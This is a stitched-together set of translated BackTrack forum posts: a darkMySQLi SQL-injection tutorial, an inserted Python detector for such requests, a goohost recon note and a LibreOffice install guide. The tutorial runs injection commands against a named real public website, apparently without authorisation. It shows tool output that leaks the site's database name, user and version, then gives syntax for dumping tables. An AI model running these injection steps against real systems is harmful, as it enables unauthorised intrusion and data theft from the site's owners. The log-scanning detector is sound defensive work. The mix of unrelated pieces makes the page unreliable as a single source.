darkMySQLI tutorial !!!

This tool may be quite old, but since it ships with BackTrack 5, I want to share it here.

Let's get straight to it.

The directory:

Code:
/pentest/web/darkmysqli

Next :

Code:
root@riftrick{/pentest/web/darkmysqli}:ls
./  ../  darkMySQLi.log  DarkMySQLi.py
root@riftrick{/pentest/web/darkmysqli}:

I happened to find a vulnerable site, which I will use as the example here:

Code:
http://www.nationalzoo.si.edu/news.php?id=720'

Spoiler! :
root@riftrick{/pentest/web/darkmysqli}:python DarkMySQLi.py --help

darkMySQLi v1.6 ensue1@gmail.com
forum.darkc0de.com
Usage: ./darkMySQLi.py [options]
Options:
-h, --help shows this help message and exits
-d, --debug display URL debug information

Target:
-u URL, --url=URL Target url

Methodology:
-b, --blind Use blind methodology (req: --string)
-s, --string String to match in page when the query is valid
Method:
--method=PUT Select to use PUT method ** NOT WORKING
Modes:
--dbs Enumerate databases MySQL v5+
--schema Enumerate Information_schema (req: -D,
opt: -T) MySQL v5+
--full Enumerate all we can MySQL v5+
--info MySQL Server configuration MySQL v4+
--fuzz Fuzz Tables & Columns Names MySQL v4+
--findcol Find Column length MySQL v4+
--dump Dump database table entries (req: -T,
opt: -D, -C, --start) MySQL v4+
--crack=HASH Crack MySQL Hashs (req: --wordlist)
--wordlist=LIS.TXT Wordlist to be used for cracking
Define:
-D DB database to enumerate
-T TBL database table to enumerate
-C COL database table column to enumerate
Optional:
--ssl To use SSL
--end To use + and -- for the URLS --end "--" (Default)
To use /**/ and /* for the URLS --end "/*"
--rowdisp Do not display row # when dumping
--start=ROW Row number to begin dumping at
--where=COL,VALUE Use a where clause in your dump
--orderby=COL Use a orderby clause in your dump
--cookie=FILE.TXT Use a Mozilla cookie file
--proxy=PROXY Use a HTTP proxy to connect to the target url
--output=FILE.TXT Output results of tool to this file


First, find the columns of the target site's database.

Syntax:
Quote:
python DarkMySQLi.py -u situstarget.com/bugs.php?id=[sql error] --findcol

Spoiler! :
root@riftrick{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://www.nationalzoo.si.edu/news.php?id=720 --findcol

|--------------------------------------------------|
| ensue1@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.nationalzoo.si.edu/news.php?id=720
[+] 18:07:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,

[!] SQLi URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...LECT+1,2--
[!] darkMySQLi URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...darkc0de--

[-] 18:07:20
[-] Total URL Requests: 2
[-] Done

Don't forget to check darkMySQLi.log

The site must be vulnerable. If it is, the next step follows the message at the end of the tool's output, "Don't forget to check darkMySQLi.log": check that log, which is in the same directory as the tool !!!

Spoiler! :

root@riftrick{/pentest/web/darkmysqli}:cat darkMySQLi.log
|--------------------------------------------------|
| ensue1@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.nationalzoo.si.edu/news.php?id=720
[+] 18:45:16
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,

[!] SQLi URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...LECT+1,2--
[!] darkMySQLi URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=2+UNION+SELECT+1,darkc0de--

[-] [18:45:24]
[-] Total URL Requests: 2
[-] Done


I have marked it in red. For the third step, enter the following syntax.

Our actual goal is to display all the columns in the victim site's database.

Quote:
python DarkMySQLi.py -u [URL from darkMySQLi.log]-- --full

Spoiler! :

root@riftrick{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...darkc0de-- --full

|--------------------------------------------------|
| ensue1@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: admzoo213_azodb
User: admzoo213_azouser@localhost
Version: 5.1.56-log
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 790
[-] Unexpected error: <class 'urllib2.HTTPError'>
[-] Trying again!
[proxy]: None
[agent]: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[debug]: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...IMIT+0,1--



[-] 18:54:41
[-] Total URL Requests: 3
[-] Done

Don't forget to check darkMySQLi.log

The next step is to look at the log again.

Spoiler! :

| ensue1@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: admzoo213_azodb
User: admzoo213_azouser@localhost
Version: 5.1.56-log
[+] Number of Rows: 790



[-] [18:54:41]
[-] Total URL Requests: 3
[-] Done


Look again at what I marked in red:
we now have the database name, user and version !!!

The next step is simply to dump the database.
If you want to do it manually, you already have what you need.

Syntax:
Code:
darkMySQLi.py -u "(target with the bug)" --dump -D (database name) -T (table name) -C (column,column)

Thank you for reading this article !!!
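Seen from the web server's side, the requests in the tool output above are easy to spot. The following is an added example, not part of the original post or of darkMySQLi: it scores access-log requests on the traits visible in that output (the `AND 1=2 UNION SELECT` shape, the `darkc0de` marker, the `--` or `/*` terminator) and notes when one client changes its Agent string between requests. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (combined format); IPs are documentation ranges.
SAMPLE_LOG = """\
198.51.100.20 - - [01/Jan/2012:18:06:02 +0000] "GET /news.php?id=720 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [01/Jan/2012:18:07:13 +0000] "GET /news.php?id=720+AND+1=2+UNION+SELECT+1,2-- HTTP/1.1" 200 4876 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
203.0.113.7 - - [01/Jan/2012:18:45:16 +0000] "GET /news.php?id=720+AND+1=2+UNION+SELECT+1,darkc0de-- HTTP/1.1" 200 4880 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
198.51.100.20 - - [01/Jan/2012:18:50:00 +0000] "GET /about.php?q=student+union+select+committee HTTP/1.1" 200 900 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')
SIGNALS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "boolean_test": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "comment_tail": re.compile(r"(?:--|/\*)\s*$"),
    "tool_marker": re.compile(r"darkc0de", re.I),
}

def score(query):
    """Return the names of the signals present in one raw query string."""
    text = unquote_plus(query)               # '+' and %xx back to characters
    text = re.sub(r"/\*.*?\*/", " ", text)   # '/**/' used in place of spaces
    return sorted(name for name, rx in SIGNALS.items() if rx.search(text))

def analyze(log_text, min_signals=2):
    """Group suspicious requests per client IP; one weak signal is not enough."""
    hits, agents = defaultdict(list), defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, ts, target, agent = m.groups()
        found = score(target.partition("?")[2])
        if len(found) >= min_signals:
            hits[ip].append((ts, found))
            agents[ip].add(agent)
    return {ip: {"requests": reqs, "rotating_agents": len(agents[ip]) > 1}
            for ip, reqs in hits.items()}

if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        print(ip, "rotating agents:", info["rotating_agents"])
        for ts, found in info["requests"]:
            print("  ", ts, ",".join(found))
```

Requiring two signals keeps a search for "student union select committee" out of the results, and a changing Agent string from one address is worth correlating because the tool output shows a different one on every run.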

/pentest/enumeration/google/goohost#

GOOHOST is a simple shell script written by Mr.Watakushi that collects information about the hosts, IPs, or subdomains of a target domain.

Goohost is included by default in Back|track 5 R2.
Code:
root@bt:~# cd /pentest/enumeration/google/goohost/

OK, how to use it!
The goohost tool has 3 methods: IP, HOST, MAIL.

For example, to scan indonesianbacktrack.or.id:

Code:
root@bt:/pentest/enumeration/google/goohost# ./goohost.sh -m ip -t indonesianbacktrack.or.id

The report will be saved to a file.
For the other methods, feel free to explore further.

Screenshot:
http://i1168.photobucket.com/albums/r482/KhairilUshan/goohost.png


WARNING!
DO NOT CARELESSLY RUN SCANS (INFORMATION GATHERING). THE CONSEQUENCES ARE SEVERE IF THE SCANNING WE DO IS ILLEGAL: THE PENALTY IS A FINE OF BILLIONS OF RUPIAH AND/OR SEVERAL YEARS IN PRISON.


Hehe, that's all for now, everyone.

u5h4nt
IBTeam

Install LibreOffice on BackTrack V

As a replacement for OpenOffice, which has now become a paid product, let me introduce LibreOffice, whose features are just as good as OpenOffice's.

OK, let's get straight to it.

# download the Debian file
root@riftrick:~# wget http://kambing.ui.ac.id/tdf/libreoffice/...-US.tar.gz
# extract the package
root@riftrick:~# tar zxvf LibO_3.3.2_Linux_x86_install-deb_en-US.tar.gz
# installation
root@riftrick:~# cd LibO_3.3.2rc2_Linux_x86_install-deb_en-US
root@riftrick:~/LibO_3.3.2rc2_Linux_x86_install-deb_en-US# cd DEBS
root@riftrick:~/LibO_3.3.2rc2_Linux_x86_install-deb_en-US/DEBS# sudo dpkg -i *.deb
# so that it shows up in the desktop menu
root@riftrick:~/LibO_3.3.2rc2_Linux_x86_install-deb_en-US/DEBS# cd desktop-integration
root@riftrick:~/LibO_3.3.2rc2_Linux_x86_install-deb_en-US/DEBS/desktop-integration# sudo dpkg -i *.deb

done !

Hope this is useful.

___________________________________________________
#####################################
___________________________________________________

Or with:
sudo add-apt-repository ppa:libreoffice/ppa
sudo apt-get update
sudo apt-get install libreoffice libreoffice-l10n-it libreoffice-help-it

Thanks, 9oBl4ck$
IBTeam
 

I'M A LAMER DON'T TROLL ME mas[TER] Copyright © 2013 | Powered by rifsivk yum